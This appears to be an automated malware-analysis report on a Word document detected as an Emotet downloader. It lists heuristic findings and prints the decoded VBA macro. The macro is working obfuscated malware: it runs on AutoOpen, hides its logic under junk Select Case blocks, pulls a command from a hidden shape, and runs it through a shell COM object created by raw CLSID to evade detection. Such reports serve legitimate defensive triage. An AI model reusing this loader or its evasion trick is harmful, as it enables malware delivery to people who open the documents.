MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6765662-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6765662-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set wpTmORCZ = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HaaBiLa) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set wpTmORCZ = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HaaBiLa) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6862 bytes |
SHA-256: dc64fa5df8318bd2b5fc0cfea43a0b3b51020beabce8f2efce63dce077882ddb |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
120 of 181 identifiers look randomly generated (e.g. 'SaPkzzGTmbo') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GaLTbMhr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case oErsqBA
Case 21851158
EpWnUAj = 40229889
uhzoi = CLng(335393460)
Case 125659895
tpMQpQL = Oct(KOQsFkPjc)
zwwrDKOzp = aAVsZRI
Case 71341793
GPYKuJmPN = CDate(KROMo)
UaCmBBpbh = Int(122229003 * sYTnc)
End Select
On Error Resume Next
Select Case ZNEjJ
Case 279467587
HQqSKL = 305921407
zZmAB = CLng(222921588)
Case 132651624
KApoSYwH = Oct(HrOlWTz)
DoLqEBJZ = uabJAaF
Case 194399572
jTCBiRjwC = CDate(jXbGnR)
sJtGwfOqi = Int(160623235 * MHRIHcmf)
End Select
On Error Resume Next
Select Case VSvhcTI
Case 163779382
OPtYVTQA = 205860914
jLYiljjc = CLng(317724797)
Case 190860647
qjfpj = Oct(onmLL)
EnsLCw = klRZzQznK
Case 9721682
qMvhXfOil = CDate(cNsdY)
TrtUjjDsQ = Int(163470622 * iZlVi)
End Select
Set VfboDhQvB = Shapes("SaPkzzGTmbo")
On Error Resume Next
Select Case PNvrCnlQ
Case 100463081
wDnWqcU = 18231981
XaJGij = CLng(195774619)
Case 276573924
LXlrShIwr = Oct(hzcfMQ)
owoNE = wcSGF
Case 46661229
LZzsFs = CDate(EkGOukzUN)
vzqarfBfH = Int(149009755 * PAaCpdJI)
End Select
On Error Resume Next
Select Case XEHnzzpz
Case 165055754
YVlDjEk = 11773503
VdiLf = CLng(106223360)
Case 81415117
TZDsVunz = Oct(tBzUQ)
lJqakcT = UcDGDo
Case 300527413
XlSWXVc = CDate(bwFiL)
EnEFwBpp = Int(186335264 * zNiQS)
End Select
kABIaX = "" + dPWLI + UXCEsaT + TtvMzVGp + VfboDhQvB.TextFrame.TextRange.Text + TXnmaMo + LFGqMLL + zdPtY
On Error Resume Next
Select Case LSWEsdah
Case 177904796
JLAduRqci = 107914690
IiFmrWKi = CLng(119791015)
Case 20280931
GaMziil = Oct(jAILAiiqX)
nDFFzDjR = BGQwIr
Case 196615577
aQziI = CDate(ikmzXEDJj)
wfzZBaJN = Int(112189254 * jtQCzT)
End Select
On Error Resume Next
Select Case uiDMBHLLs
Case 78763007
GuAdwY = 147129098
dSZjjOoiw = CLng(47872630)
Case 238705071
qzaiB = Oct(iwsjHZZ)
jHkdfMBEF = VwWzNYME
Case 51362206
UIUWb = CDate(qXzzKzG)
ihzVbXHm = Int(293013866 * IDGlkTUDR)
End Select
On Error Resume Next
Select Case vSZNabIIk
Case 151594535
wSXNzw = 219396845
JUwWwBvEO = CLng(217680833)
Case 62993835
inHto = Oct(EGospURY)
knEbORiC = wvbMfXu
Case 178389058
VlLKdZI = CDate(bIQfiFZWL)
JFukEl = Int(246755736 * tNsbRzNsw)
End Select
Set wpTmORCZ = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HaaBiLa)
On Error Resume Next
Select Case NAoJwWhCV
Case 273529677
BsiFmSbj = 42615924
uzwJUNE = CLng(144382698)
Case 329569044
hXoIMwl = Oct(Ccfzf)
YHcuzzhQj = SArAcIc
Case 215427981
LziDato = CDate(XddtwTDk)
kKWwwR = Int(284155670 * pLGkbu)
End Select
On Error Resume Next
Select Case hoBEJGT
Case 112056683
cUOEYj = 338685172
dYHoHzsd = CLng(31667711)
Case 332679787
RDRbjLwHU = Oct(AkpRsjLXZ)
LTznwF = ZoJaFIaz
Case 94633123
sisbZi = CDate(coSXPQjF)
ihzGdfid = Int(150190793 * LUvcOS)
End Select
On Error Resume Next
Select Case zWCVRVqF
Case 290103681
jiWvdw = 233631985
XhPHb = CLng(209817654)
Case 322237547
OOrJvsNjQ = Oct(JinQAI)
jKRlzpZ = NpMTr
Case 306661953
YYHcNiW = CDate(QmfSmASGj)
mvVfH = Int(108102002 * RCiCBQZ)
End Select
On Error Resume Next
Select Case rjnEpB
Case 196063685
IinqT = 113926415
dDFYo = CLng(5468169)
Case 219414423
qPShhi = Oct(QCumUON)
JfiCtaNA = VAsZMATSK
Case 144112870
oXTwZjOlw = CDate(wnQTwtFw)
mcPSLjlC = Int(22534269 * bUKsQ)
End Select
Const AbYYvdTH = 0
On Error Resume Next
Select Case CRYKzROO
Case 319688484
msQZQ = 292890528
nMiFd = CLng(252997013)
Case 17527722
CwMWha = Oct(QRFrGBQm)
DUQJHpdk = XNJZhYf
Case 143120012
zVBrOizbz = CDate(YmAXZo)
IWsMN = Int(125054312 * wKMirjj)
End Select
On Error Resume Next
Select Case zCivn
Case 132602995
EURmRwS = 141880354
GVfmcNUoP = CLng(290949277)
Case 245005670
zENzPIt = Oct(SkzUtRlkM)
EimOtQW = fkipfviwF
Case 104019008
mCpZV = CDate(WVKsLbjb)
oGmlLwdXd = Int(57648761 * cEElwM)
End Select
wpTmORCZ.Run! kABIaX, AbYYvdTH
On Error Resume Next
Select Case iusjNOn
Case 9084961
jhYFvvki = 226248467
bTFqwj = CLng(192274611)
Case 195624993
RAUacNq = Oct(YEYMbqU)
DpVlcXj = FwHdEvzkk
Case 89960387
mPHwrFSM = CDate(KFAdkRt)
HszuUVVfG = Int(85296037 * cHnbNGi)
End Select
On Error Resume Next
Select Case LNATp
Case 290296464
VUqkFUf = 296916343
cjqhJbop = CLng(196622604)
Case 31170393
XIFQQ = Oct(bPqkbMjn)
oTolujWsr = UtzkYLq
Case 242179682
CNPaUSsQ = CDate(AATGt)
nUAsKa = Int(4673055 * Olwtbi)
End Select
On Error Resume Next
Select Case InVuGD
Case 104042503
HikON = 104248786
KsvYX = CLng(339496039)
Case 257392642
nbjnOTww = Oct(tKnQAY)
MXItFTt = bzinlzlQ
Case 138539799
iTXPA = CDate(LmYVDclJ)
SMzrtd = Int(135087440 * wMPoIKMH)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.